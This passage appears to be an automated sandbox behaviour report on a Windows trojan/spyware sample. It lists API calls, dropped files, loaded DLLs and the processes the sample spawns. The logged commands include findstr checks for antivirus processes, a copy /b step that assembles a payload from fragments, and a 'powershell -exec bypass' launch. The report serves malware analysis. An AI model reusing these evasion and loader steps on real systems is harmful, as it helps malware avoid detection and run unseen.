      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,1_2_004038AF
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeFile created: C:\Windows\LongerCattleJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeFile created: C:\Windows\MarkerHardlyJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeFile created: C:\Windows\WineEntertainmentJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeFile created: C:\Windows\TarSomehowJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeFile created: C:\Windows\FunctionalTriviaJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_0040737E1_2_0040737E
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_00406EFE1_2_00406EFE
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_004079A21_2_004079A2
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_004049A81_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\801291\Historic.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: String function: 004062CF appears 57 times
      Source: eMBO6wS1b5.exeStatic PE information: invalid certificate
      Source: eMBO6wS1b5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/26@5/2
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004044D1
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_004024FB CoCreateInstance,1_2_004024FB
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeFile created: C:\Users\user\AppData\Local\Temp\nsz79F5.tmpJump to behavior
      Source: eMBO6wS1b5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: eMBO6wS1b5.exeReversingLabs: Detection: 26%
      Source: eMBO6wS1b5.exeVirustotal: Detection: 20%
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeFile read: C:\Users\user\Desktop\eMBO6wS1b5.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\eMBO6wS1b5.exe "C:\Users\user\Desktop\eMBO6wS1b5.exe"
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Leu Leu.cmd & Leu.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 801291
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Array
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Serve" Ltd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bumper + ..\Specialist + ..\Bind + ..\Intended + ..\Francisco + ..\Recent f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\801291\Historic.com Historic.com f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Leu Leu.cmd & Leu.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 801291Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ArrayJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Serve" Ltd Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bumper + ..\Specialist + ..\Bind + ..\Intended + ..\Francisco + ..\Recent fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\801291\Historic.com Historic.com fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass error code: 523Jump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: eMBO6wS1b5.exeStatic file information: File size 1325507 > 1048576
      Source: eMBO6wS1b5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.2838688444.0000000007104000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbi source: powershell.exe, 0000001C.00000002.2842137856.00000000081B6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000001C.00000002.2841888990.0000000008183000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406328
      Source: eMBO6wS1b5.exeStatic PE information: real checksum: 0x142756 should be: 0x1494aa
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_02CA0C20 push edi; iretd 28_2_02CA0C32
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_07493207 pushad ; iretd 28_2_07493221

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\801291\Historic.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\801291\Historic.comJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\801291\Historic.comProcess information set: NOOPENFILEERRORBOXJump to behavior
